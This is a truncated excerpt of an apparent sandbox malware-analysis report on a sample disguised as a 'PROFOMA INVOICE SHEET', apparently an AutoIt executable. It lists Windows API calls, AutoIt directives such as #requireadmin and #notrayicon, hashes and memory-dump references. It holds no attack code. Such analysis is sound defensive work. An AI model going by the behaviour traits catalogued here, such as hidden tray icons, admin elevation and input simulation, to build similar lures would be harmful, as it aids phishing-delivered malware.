                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: b905d71df655fdf4b628348b4e9797dd80c722ba10f8a0ca179731167be38f52
                                    • Instruction ID: a9cfe61e5ae8993b84ea70dd15337b13bd0108261918484d4cf0c55dec85f434
                                    • Opcode Fuzzy Hash: b905d71df655fdf4b628348b4e9797dd80c722ba10f8a0ca179731167be38f52
                                    • Instruction Fuzzy Hash: B82160B5601208AFDB12DF64DCD1DBB37ADEB4A394B050059FA109B291DB31EC12CB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 176396367-2734436370
                                    • Opcode ID: 54c72ab0df46cb1ebc7eb88b4c9a428d36e3c3bc82a36c3738a5c66df724f22b
                                    • Instruction ID: 4d187dffed7113fb46a4987d7dee938ddec63dde22f299939ac6a6b62113d1f6
                                    • Opcode Fuzzy Hash: 54c72ab0df46cb1ebc7eb88b4c9a428d36e3c3bc82a36c3738a5c66df724f22b
                                    • Instruction Fuzzy Hash: A8215B7220462166C733AB24DC02FB773DC9F52310F15802BFA4ADB089EB71AD45C295
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00393840
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00393850
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00393876
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 7c25e02be2c4986c8d418aa9f3c7a17a8ed6234b1d90f80ca78e8f09fa799f0f
                                    • Instruction ID: f5886601b15e88346fa362cbe72264bfe747e661c0d0d13d9b6b8c6eaa85ca6c
                                    • Opcode Fuzzy Hash: 7c25e02be2c4986c8d418aa9f3c7a17a8ed6234b1d90f80ca78e8f09fa799f0f
                                    • Instruction Fuzzy Hash: 6221D4B2614118BBEF238F94CC45FBB376EEF89750F118114F9009B190C672DC5187A0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00374A08
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00374A5C
                                    • SetErrorMode.KERNEL32(00000000,?,?,0039CC08), ref: 00374AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume
                                    • String ID: %lu
                                    • API String ID: 2507767853-685833217
                                    • Opcode ID: 7bffd06cf8661484e9323169bbe58d9d18b6c6be25358c9a873a6cb291c0b273
                                    • Instruction ID: 5a57f3e9a230095e79208edf32d5a03a180d4224b8c23ad56d8a7d202b70e8c7
                                    • Opcode Fuzzy Hash: 7bffd06cf8661484e9323169bbe58d9d18b6c6be25358c9a873a6cb291c0b273
                                    • Instruction Fuzzy Hash: BD315175A00109AFDB12DF64C985EAA7BF8EF08308F1480A9F909DF252D775ED45CB61
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0039424F
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00394264
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00394271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: a7966b7b49781589e7c8205897f34c5f646549fc7f233bba2a2241cb0a21129e
                                    • Instruction ID: a9e5c6b9232910eeecb24f3656f40e874488b8aac1bc28485487e2f31ec62301
                                    • Opcode Fuzzy Hash: a7966b7b49781589e7c8205897f34c5f646549fc7f233bba2a2241cb0a21129e
                                    • Instruction Fuzzy Hash: 32110632240208BEEF225F39CC06FAB7BACEF85B54F120524FA95E6090D271DC529B20
                                    APIs
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                      • Part of subcall function 00362DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00362DC5
                                      • Part of subcall function 00362DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00362DD6
                                      • Part of subcall function 00362DA7: GetCurrentThreadId.KERNEL32 ref: 00362DDD
                                      • Part of subcall function 00362DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00362DE4
                                    • GetFocus.USER32 ref: 00362F78
                                      • Part of subcall function 00362DEE: GetParent.USER32(00000000), ref: 00362DF9
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00362FC3
                                    • EnumChildWindows.USER32(?,0036303B), ref: 00362FEB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                    • String ID: %s%d
                                    • API String ID: 1272988791-1110647743
                                    • Opcode ID: e1d2bc40ee3fafb26dfeb961d73a732771a974f42b421407e46417363f178f74
                                    • Instruction ID: 53f2d3486dff8ccfcc63054245f8568786c2d7b8a94462155d572b4eda3424cd
                                    • Opcode Fuzzy Hash: e1d2bc40ee3fafb26dfeb961d73a732771a974f42b421407e46417363f178f74
                                    • Instruction Fuzzy Hash: C911E1B12002056BCF06BF74CC96FEE376AAF84304F048075F9099F29ADE7099498B70
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003958C1
                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003958EE
                                    • DrawMenuBar.USER32(?), ref: 003958FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$InfoItem$Draw
                                    • String ID: 0
                                    • API String ID: 3227129158-4108050209
                                    • Opcode ID: f711b9dfb6b5672e1800a140fbd97b246be953f0734cb7c0455bf9d1c455bc0a
                                    • Instruction ID: cf33057b563f3d76278481efe705788777226ba9d9ef70931be91bf3b5cbf7c7
                                    • Opcode Fuzzy Hash: f711b9dfb6b5672e1800a140fbd97b246be953f0734cb7c0455bf9d1c455bc0a
                                    • Instruction Fuzzy Hash: 80015B32504218EFDF239F22DC44BAEBBB8FB45761F10809AE849DA151DB308AC4DF21
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76d10db9b26a01c5b8f0a9d3ea5cfd68e36f834312de913d3a1dac3fe02b4d20
                                    • Instruction ID: 52c26a2446ed5583a7e1d056b5087da484812de02bea23e342340358171e2120
                                    • Opcode Fuzzy Hash: 76d10db9b26a01c5b8f0a9d3ea5cfd68e36f834312de913d3a1dac3fe02b4d20
                                    • Instruction Fuzzy Hash: DDC16D75A00206EFCB19CFA4C895EAEB7B5FF49304F218598E505EB255D731ED41CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInitInitializeUninitialize
                                    • String ID:
                                    • API String ID: 1998397398-0
                                    • Opcode ID: c6630ea6157f195d29d00a0f3ce91879550195c1bfddc744be41ffe730923331
                                    • Instruction ID: bc9d410b0f135ab98f019185ab2b842a7fb15997a2f259ed59f9eca9d7ed94e8
                                    • Opcode Fuzzy Hash: c6630ea6157f195d29d00a0f3ce91879550195c1bfddc744be41ffe730923331
                                    • Instruction Fuzzy Hash: 35A15E756043019FC702EF28C895A6AB7E5FF89714F058899F9899F3A1DB30EE41CB51
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0039FC08,?), ref: 003605F0
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0039FC08,?), ref: 00360608
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0039CC40,000000FF,?,00000000,00000800,00000000,?,0039FC08,?), ref: 0036062D
                                    • _memcmp.LIBVCRUNTIME ref: 0036064E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: f86612340a66153d1eea7aff7f80aa55475899c246bbd4d5cc5a53d3080f2f87
                                    • Instruction ID: 85d3acfa5b2d01c4fd203b71e3eaee26d82976f64949d758d1fb582405aad7b7
                                    • Opcode Fuzzy Hash: f86612340a66153d1eea7aff7f80aa55475899c246bbd4d5cc5a53d3080f2f87
                                    • Instruction Fuzzy Hash: 94812A71A00109EFCB05DF94C985EEEB7B9FF89315F208598E506AB254DB71AE06CF60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: c7037291d336eb24a8068678bb1b6f1d08dbc8778ce2ed2877f4791eb3b2f39d
                                    • Instruction ID: 31e06b408395a66a7ae64e3d635d00000a371028fd7a36c296bfb75356c96ef3
                                    • Opcode Fuzzy Hash: c7037291d336eb24a8068678bb1b6f1d08dbc8778ce2ed2877f4791eb3b2f39d
                                    • Instruction Fuzzy Hash: 4F417F35A00A10AFDB236BBAAC857BE3AF8EF42370F150625F418DE391E77458C15761
                                    APIs
                                    • GetWindowRect.USER32(0125E5B8,?), ref: 003962E2
                                    • ScreenToClient.USER32(?,?), ref: 00396315
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00396382
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 54329510fc6d275d45c82a91d5d195499a96970cd17f04ae011b77a0d36ddebf
                                    • Instruction ID: 2d784da7299545baa55a08e8accf5a9ee0b6c3c79f2b12895cd0165160675c98
                                    • Opcode Fuzzy Hash: 54329510fc6d275d45c82a91d5d195499a96970cd17f04ae011b77a0d36ddebf
                                    • Instruction Fuzzy Hash: 7C517D74A01209EFDF12CF68D8819AE7BB5FF45360F11815AF8159B2A0D730ED81CB90
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00381AFD
                                    • WSAGetLastError.WSOCK32 ref: 00381B0B
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00381B8A
                                    • WSAGetLastError.WSOCK32 ref: 00381B94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$socket
                                    • String ID:
                                    • API String ID: 1881357543-0
                                    • Opcode ID: 4957a36737b3d8f3188c451d941d3da237bb5d04367db6703869cc2f90b88523
                                    • Instruction ID: 2a739b99fd5587261e5e087ffc1a404525ffd43303d48a5e3047b00492cb9463
                                    • Opcode Fuzzy Hash: 4957a36737b3d8f3188c451d941d3da237bb5d04367db6703869cc2f90b88523
                                    • Instruction Fuzzy Hash: A741C4746003006FE726AF24C896F6977E9AB44718F548498F91A9F3D2D772ED82CB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c320f3d57bb25b782b26b2a6442b27014fec83031f45f5f47649534565153406
                                    • Instruction ID: bc5a5275b56089b36ff00e18f4ab288883531c51482d146707d83ec8e398c6a0
                                    • Opcode Fuzzy Hash: c320f3d57bb25b782b26b2a6442b27014fec83031f45f5f47649534565153406
                                    • Instruction Fuzzy Hash: D8410675A00714AFE7269F78CC81B6ABBE9EF89710F10462EF241DF692D771A9418780
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00375783
                                    • GetLastError.KERNEL32(?,00000000), ref: 003757A9
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003757CE
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003757FA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 0f9f3d2ece9330077487f5245a8caa37d85b3b76cb51ef935f963c1934e4ee6f
                                    • Instruction ID: 602d80ce586b2a470c4053cf64ec26b0b4f1df38b1390c7bb7ef64432a5c93d6
                                    • Opcode Fuzzy Hash: 0f9f3d2ece9330077487f5245a8caa37d85b3b76cb51ef935f963c1934e4ee6f
                                    • Instruction Fuzzy Hash: AA412F39600610DFCB26DF19C554A5EBBE5EF49720B19C488E84A5F3A2CB75FD40CB91
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00326D71,00000000,00000000,003282D9,?,003282D9,?,00000001,00326D71,?,00000001,003282D9,003282D9), ref: 0033D910
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0033D999
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0033D9AB
                                    • __freea.LIBCMT ref: 0033D9B4
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: eafd0a8be68d2f95fd60c58c27c4a5105865de75843e0d9c607fd68f1124fe41
                                    • Instruction ID: fec3a4533c30cebc5dd582491b0419c3aa55c8eba32490e01f6c62b1c5341da5
                                    • Opcode Fuzzy Hash: eafd0a8be68d2f95fd60c58c27c4a5105865de75843e0d9c607fd68f1124fe41
                                    • Instruction Fuzzy Hash: BD31C172A0021AABDF26DF64EC81EAF7BA9EB41310F064169FC04DB151EB35DD54CBA0
                                    APIs
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00395352
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00395375
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00395382
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003953A8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LongWindow$InvalidateMessageRectSend
                                    • String ID:
                                    • API String ID: 3340791633-0
                                    • Opcode ID: 22e0be1532d3299d498da493e977721984f322d16a74e4398191d4b97304f5c4
                                    • Instruction ID: 23f1c499ab7c850baeaa46ee8b86f47be37cfbccf4b87d1945abd2429d6b2591
                                    • Opcode Fuzzy Hash: 22e0be1532d3299d498da493e977721984f322d16a74e4398191d4b97304f5c4
                                    • Instruction Fuzzy Hash: 8D31E338A55A08FFEF339E54CC95BE87769AB05390F594102FA10961E1C7B19DC09B41
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0036ABF1
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 0036AC0D
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 0036AC74
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0036ACC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 69dd830c121d08ed2d8742de4091599994882107dcc4172266a38f5991956d21
                                    • Instruction ID: 7ee2d273d994eca789c2a720de06d969bfe3bb020c656f136334dd7b620e03bf
                                    • Opcode Fuzzy Hash: 69dd830c121d08ed2d8742de4091599994882107dcc4172266a38f5991956d21
                                    • Instruction Fuzzy Hash: EC313B70A04B186FEF37CB658C087FA7BA9AB45310F04C31BE485E61D8C375D9819B62
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0039769A
                                    • GetWindowRect.USER32(?,?), ref: 00397710
                                    • PtInRect.USER32(?,?,00398B89), ref: 00397720
                                    • MessageBeep.USER32(00000000), ref: 0039778C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
